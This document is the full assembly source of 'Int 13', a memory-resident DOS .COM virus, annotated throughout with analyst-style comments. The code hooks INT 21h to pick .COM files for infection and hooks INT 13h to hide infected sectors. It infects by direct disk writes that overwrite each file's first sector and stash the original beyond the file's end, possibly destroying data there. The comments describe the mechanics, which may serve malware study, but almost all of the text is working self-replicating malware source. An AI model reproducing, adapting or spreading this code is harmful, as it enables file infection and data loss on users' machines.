;-----------------------------------------------------------------------
; "Int 13" - memory-resident DOS .COM infector (MASM/TASM syntax, 16-bit
; real mode). There is no ORG: the installer copies the 512-byte image to
; offset 0 of a DOS disk buffer and all `offset` uses assume origin 0.
; Analyst summary (from the code below): hooks INT 21h (AH=12h, FCB Find
; Next) to pick targets, hooks INT 13h (AH=02h) to hide the infected first
; sector, infects by direct sector writes via the BIOS entry, and parks
; the vectors it needs in the unused IVT slots 9Ch-9Fh (an observable
; indicator: those entries normally do not point into conventional memory).
;-----------------------------------------------------------------------
Code Segment
Assume CS:Code                    ; only CS is assumed, so the data references in the
                                  ; handlers assemble with a CS: override (they run
                                  ; with the caller's DS)

; Interrupt numbers whose 4-byte IVT entries are used as storage and
; invoked with `int N`:
Old13   = 9Ch                     ; INT 13h vector as found at install time
True13  = 9Dh                     ; handler returned by INT 2Fh/AH=13h (DOS's own disk entry)
Saved21 = 9Eh                     ; INT 21h vector as found at install time
Temp13  = 9Fh                     ; scratch copy of INT 13h while Infect has a file open
;-----------------------------------------------------------------------
; Installer. Executes inside the host .COM at CS:100h and is position
; independent until the far RETF at the end.
; Side effects: fills IVT slots Old13/True13/Saved21, calls INT 2Fh/AH=13h
; twice, copies 512 bytes from CS:100h into the disk buffer pointed to by
; List-of-Lists+12h and unlinks that buffer from DOS's chain.
; Leaves on the stack for Continue (top first): 21h*4, 13h*4, host AX.
;-----------------------------------------------------------------------
VStart: loop Next ; Virus ID      ; encodes as E2 00 - the word 00E2h the handlers test for
Next:   push ax                   ; host's AX, popped by Continue right before the host runs
        mov di,13h * 4            ; DI -> IVT entry of INT 13h
        push di                   ; second `pop di` in Continue
        xor bp,bp
        mov ds,bp                 ; DS = 0: interrupt vector table
        les bx,[di]               ; ES:BX = current INT 13h handler
        mov di,True13 * 4
        mov [di-4],bx             ; slot Old13 (= True13-1) := that handler
        mov [di-2],es
        mov ah,13h
        int 2Fh                   ; MUX "set disk interrupt handler": returns the previous ES:BX/DS:DX
        push es
        push bx                   ; keep the handler DOS reported
        int 2Fh                   ; second call: presumably hands the returned values back so DOS is
                                  ; left as it was - TODO confirm against INT 2Fh/AX=1300h semantics
        mov es,bp                 ; ES = 0 (BP untouched by the calls)
        mov si,21h * 4            ; SI -> IVT entry of INT 21h
        pop ax
        stosw                     ; slot True13 := reported handler (DI is still True13*4)
        pop ax
        stosw                     ; ...segment; DI now = Saved21*4
        push si                   ; first `pop di` in Continue
        movsw                     ; slot Saved21 := INT 21h vector (relies on DS being 0 again here)
        movsw
        mov ah,52h
        int 21h                   ; DOS List of Lists -> ES:BX
        push es
        pop ds                    ; DS:BX = List of Lists
        les ax,[bx+12h] ; ax is now 0000h, i.e. ah is 0.   ; ES = segment of the far pointer at
                                                         ; LoL+12h (presumably the disk-buffer chain head)
        push word ptr es:[bp+2]   ; BP = 0: word at buffer+2, written to LoL+14h below
        mov si,100h               ; source CS:100h - where this image was loaded
        mov cx,si                 ; 100h words = 512 bytes, the whole image regardless of VLen
        mov di,bp                 ; destination ES:0000
        push si
        rep movs word ptr es:[di], cs:[si]   ; resident copy lives at buffer_seg:0000
        pop si
        pop word ptr ds:[bx+14h]  ; LoL+14h := saved word, so the chain no longer starts at this buffer
        push es                   ; far return target: buffer_seg:Continue
        mov al, offset Continue ; Let's use it!   ; AH still 0 - requires offset Continue < 100h
        push ax
        retf                      ; continue inside the resident copy
;-----------------------------------------------------------------------
; State carried inside the image. Int13V overwrites all four Saved*
; words during an infection; the copy that ends up in a file carries, in
; SavedCX/SavedDX, the CHS address from which Int13 reads the original
; first sector back. FileWord is the 2-byte read buffer Infect uses.
; Infect depends on this exact order: FileWord-8 = SavedCX,
; FileWord-6 = SavedDX, FileWord-4 = SavedBX:SavedES (loaded with lds).
;-----------------------------------------------------------------------
SavedCX dw 1
SavedDX dw 0
SavedBX dw 0
SavedES dw 0

FileWord dw 0

SCX = offset SavedCX - offset VStart   ; offsets from the image start, applied by Int13 to a
SDX = offset SavedDX - offset VStart   ; freshly read sector at ES:BX that carries the marker
;-----------------------------------------------------------------------
; Second stage, running in the resident segment (CS = taken disk buffer,
; BP = 0). Pops 21h*4 and 13h*4 left by the installer and points both
; vectors at the handlers below. Then locates its own pathname behind the
; environment block, opens it and reads the file back over PSP:100h -
; with the INT 13h hook already active that read is expected to yield the
; clean host - and far-jumps to PSP:100h.
;-----------------------------------------------------------------------
Continue: mov es,bp               ; ES = 0 (IVT)
        pop di                    ; DI = 21h*4
        mov al,offset Int21 ; Two times!      ; AH still 0: Int21 must also lie below offset 100h
        stosw
        mov es:[di],cs            ; INT 21h -> CS:Int21
        pop di                    ; DI = 13h*4
        mov al,offset Int13 ; Three times!
        stosw
        mov es:[di],cs            ; INT 13h -> CS:Int13

        mov es,[bp+2Ch] ; This assumes SS:   ; SS = host PSP segment; PSP+2Ch = environment segment
        mov di,bp                 ; ES:DI = env:0000
        xchg ax,bp                ; AX = 0 (AL = 0 is the scasb target); BP now holds offset Int13
        dec cx                    ; CX was 0 after the rep movs -> FFFFh, effectively unbounded
ScanEnv: repne scasb              ; skip one ASCIIZ variable
        scasb                     ; a second 0 ends the block
        jnz ScanEnv
        scasw                     ; skip the count word; DI -> program pathname (DOS 3+)
        push es
        pop ds
        mov dx,di                 ; DS:DX = own pathname
        mov ah,3Dh                ; open, AL = 0 read-only
        int 21h                   ; via the new hook, which chains anything but AH=12h
        jc NoStart
        mov dx,si                 ; SI = 100h (from the installer)
        xchg ax,bx                ; BX = handle
        mov ah,3Fh                ; read up to CX bytes (whatever the scan left in CX)
        push ss
        pop ds                    ; into PSP:100h
        int 21h
        mov ah,3Eh
        int 21h                   ; close

        pop ax                    ; host's AX
        push ss
        push si                   ; PSP:100h
        push ss
        pop es                    ; ES = PSP, as a .COM expects
        retf                      ; run the host
; Own file could not be opened: terminate (AL = whatever the failed open left).
NoStart: mov ah,4Ch
        int 21h
;-----------------------------------------------------------------------
; Int13V: INT 13h handler installed only while Infect has a file open.
; Records the registers of each disk call DOS makes (ES:BX buffer,
; CX/DX cylinder-sector and head-drive) so Infect can learn where the
; file's sectors are and which DOS buffer received them, then chains.
; Go13 is also Int13's pass-through for everything but AH=02h.
;-----------------------------------------------------------------------
Int13V: mov SavedBX,bx            ; CS-relative stores (Assume CS:Code)
        mov SavedCX,cx
        mov SavedDX,dx
        mov SavedES,es

Go13:   int Old13                 ; INT 13h as found at install time
        jmp short RetF2           ; return with the chained call's flags
;-----------------------------------------------------------------------
; Int13: resident INT 13h hook (stealth). Only AH=02h is inspected. After
; the real read, if the first sector returned starts with the marker word
; 00E2h, two sectors are read via True13 from the CHS stored in that image
; (SCX/SDX) into B800:7800h and the caller's buffer is overwritten with the
; second of them - the stashed original first sector. Anything reading the
; file through INT 13h/AH=02h thus sees clean contents. Only the first
; sector of a multi-sector read is checked or replaced.
; B800h is the colour text frame buffer; using 1 KiB of it as scratch
; presumably shows up as screen garbage and assumes that adapter exists.
;-----------------------------------------------------------------------
Int13:  cmp ah,2
        jne Go13
        push ds
        push si
        push di
        push cx
        push dx
        push es
        push bx
        push dx                   ; inner copy, restored right after the read so DL (drive) is intact
        int Old13                 ; perform the caller's read
        pop dx
        jc Exit13                 ; failed read: pass the error through
        cmp word ptr es:[bx],00E2h   ; marker = the `loop Next` bytes at VStart
        clc                       ; whatever follows, the caller is told the read succeeded
        jne Exit13
        mov ax,202h               ; read 2 sectors...
        mov cx,es:[bx+SCX]        ; ...from the CHS recorded in the infected copy
        mov dh,byte ptr es:[bx+SDX+1]   ; head from the image, drive (DL) from the caller
        mov bx,0B800h
        mov ds,bx
        mov es,bx
        mov bh,78h                ; ES:BX = B800:7800h scratch
        int True13                ; bypasses every INT 13h hook, this one included
        jc Exit13                 ; the caller then sees this failure (CF kept by retf 2)
        mov si,7A00h              ; DS:SI = second scratch sector = stashed original
        pop bx
        mov di,bx
        pop es                    ; ES:DI = caller's buffer
        mov cx,100h
        rep movsw                 ; 512 bytes: present the original contents
        jmp short Exit13_1
Exit13: pop bx
        pop es
Exit13_1: pop dx
        pop cx
        pop di
        pop si
        pop ds
RetF2:  retf 2                    ; shared return: drop the caller's FLAGS, keep ours
;-----------------------------------------------------------------------
; Int21: resident INT 21h hook. Everything except AH=12h (FCB Find Next)
; is chained. After a successful Find Next the DTA is examined with
; offsets that match an extended-FCB search result (drive at +7, name at
; +8, extension at +16, size at +36): extension ".?OM" required, names
; with "OM" in positions 2-3 (e.g. COMMAND) skipped, size must be at
; least 512 bytes, and bits 9/10 of size-1 act as a throttle that is
; stricter on drives A:/B:. Surviving entries go to Infect.
;-----------------------------------------------------------------------
Int21:  cmp ah,12h                ; FCB Find Next?
        je FindNext
        int Saved21               ; original DOS handler
        jmp RetF2                 ; return with DOS's flags
FindNext: int Saved21
        cmp al,0                  ; AL = 0: a match was written to the DTA
        jnz RetF2
        push ax
        push bx
        push ds
        push es
        mov ah,2Fh
        int Saved21               ; ES:BX = DTA
        push es
        pop ds                    ; DS:BX = search result
        mov ax,'MO'               ; 4D4Fh: 'O' then 'M' in memory order
        cmp ax,[bx+17]            ; extension bytes 2-3 == "OM" (.COM)
        jne Exit1
        cmp ax,[bx+9]             ; name bytes 2-3 == "OM" (COMMAND.COM): leave alone
        je Exit1
        mov al,[bx+7]             ; drive number (1 = A:)
        add al,'@'                ; -> drive letter for Infect's pathname
        push cx
        push dx                   ; both popped at Exit2, also after Infect
        mov cx,[bx+36]            ; file size, low word
        mov dx,200h               ; also Infect's path-buffer offset
        cmp cx,dx
        jb Exit2                  ; shorter than one sector: skip
        dec cx
        test ch,10b               ; bit 9 of size-1 clear -> infect
        jz Infect
        cmp al,'C'
        jb Exit2                  ; on A:/B: that was the only chance
        test ch,100b              ; bit 10 clear -> infect
        jz Infect
Exit2:  pop dx
        pop cx
Exit1:  pop es
        pop ds
        pop bx
        pop ax
        jmp RetF2
;-----------------------------------------------------------------------
; Infect: entered from FindNext with DS:BX = search result, AL = drive
; letter, DX = 200h and CX/DX pushed (Exit2 pops them).
; 1. Builds "X:NAME    .EXT",0 at CS:200h from the entry (padding kept).
; 2. Saves the live INT 13h vector to slot Temp13 and points INT 13h at
;    Int13V so the DOS reads below are observed.
; 3. Opens the file; reads its last byte (Int13V records the last sector's
;    CHS), then its first word (Int13V records the first sector's CHS and
;    the DOS buffer holding it). Relies on DOS going to disk for both.
; 4. Unless the word is the marker (00E2h) or "MZ" (5A4Dh): reads the last
;    sector plus the one after it into B800:7800h, replaces the second
;    with the original first sector, writes both back - the original now
;    sits in the sector following the file's last one, overwriting
;    whatever was there - then writes the 512-byte image, carrying that
;    location in SavedCX/SavedDX, over the file's first sector.
; 5. Closes the file, restores INT 13h from Temp13, returns via Exit2.
; All I/O goes through Saved21/True13, so the resident hooks never see
; their own traffic; the directory entry (size, date) is not touched here.
;-----------------------------------------------------------------------
Infect: push si
        push di
        push cs
        pop es                    ; ES = CS
        mov di,dx                 ; ES:DI = CS:200h, pathname buffer past the 512-byte image
        lea si,[bx+8]             ; DS:SI = 8.3 name in the search result
        mov ah,':'                ; AL = drive letter
        stosw                     ; "X:"
        movsw
        movsw
        movsw
        movsw                     ; 8 name characters, space padded
        mov al,'.'
        stosb
        movsw
        movsb                     ; 3 extension characters
        xor ax,ax
        stosb                     ; NUL terminator; AX = 0 for the segment loads below

        mov ds,ax
        mov es,ax                 ; DS = ES = 0 (IVT)
        mov si,13h * 4
        mov di,Temp13 * 4

        push si
        push di
        push es                   ; for the vector restore after Close

        movsw
        movsw                     ; slot Temp13 := current INT 13h vector

        mov word ptr [si-4], offset Int13V   ; INT 13h -> CS:Int13V while the file is open
        mov [si-2], cs

        push cs
        pop ds                    ; DS:DX = CS:200h pathname

        mov ah,3Dh                ; open, AL = 0 read-only
        int Saved21               ; CF is not checked: on failure BX receives the error code as "handle"
        xchg ax,bx
        mov ax,4202h              ; lseek relative to end
        mov cx,-1
        mov dx,cx                 ; offset -1: position on the last byte
        int Saved21 ; DX must now be zero (.COM)
Go:     mov ah,3Fh                ; (label not referenced in this file)
        mov dl,offset FileWord    ; DX = offset FileWord, relying on DH = 0 from the lseek result
        mov di,dx                 ; DI -> FileWord; [di-8]/[di-6]/[di-4] = SavedCX/SavedDX/SavedBX:SavedES
        neg cx ; mov cx,1
        int Saved21               ; read 1 byte: DOS fetches the last sector, Int13V records its CHS
        push [di-8]               ; last sector CX
        push [di-6]               ; last sector DX
        mov ax,4200h
        xor cx,cx ; can it be inc cx ??
        xor dx,dx
        int Saved21               ; seek to offset 0
        mov ah,3Fh
        mov dx,di
        mov cl,2
        int Saved21               ; read the first word; Saved* now describe the first sector (if DOS hit the disk)
        mov ax,[di]
        pop dx
        pop cx                    ; CX/DX = last sector
        cmp ax,00E2h
        je Close                  ; already carries the marker
        cmp ax,5A4Dh
        je Close                  ; "MZ": an EXE under a .COM name, left alone
        mov ax,202h
        push cx
        push dx
        mov bx,0B800h
        mov es,bx
        mov bh,78h                ; ES:BX = B800:7800h scratch (video RAM)
        int True13                ; read the last sector and the sector following it; CF not checked
        lds si,[di-4]             ; DS:SI = SavedES:SavedBX, the DOS buffer holding the original first sector
        push di
        mov di,7A00h
        mov cx,100h
        rep movsw                 ; second scratch sector := original first sector
        pop di
        mov ax,302h
        pop dx
        pop cx
        push cx
        push dx
        int True13                ; write both back: the original now follows the file's last sector
        pop dx
        pop cx
        mov ax,301h
        xchg cx,cs:[di-8]         ; CX/DX := first-sector CHS; the image's SavedCX/SavedDX := stash location
        xchg dx,cs:[di-6]
        push cs
        pop es
        xor bx,bx                 ; ES:BX = CS:0000, the 512-byte image
        int True13                ; overwrite the file's first sector
Close:  mov ah,3Eh
        int Saved21

        pop es                    ; ES = 0
        pop si                    ; SI = Temp13*4
        pop di                    ; DI = 13h*4

        movs word ptr es:[di], es:[si]   ; INT 13h vector restored from slot Temp13
        movs word ptr es:[di], es:[si]

        pop di
        pop si
        jmp Exit2                 ; FindNext's epilogue pops CX/DX, ES, DS, BX, AX
VName   db ' Int 13'              ; name string; not referenced by the code

VEnd    label byte
VLen    = offset VEnd - offset VStart   ; assembled image size; not referenced - the installer
                                        ; and the infection write always move 512 bytes

Code    EndS
        End VStart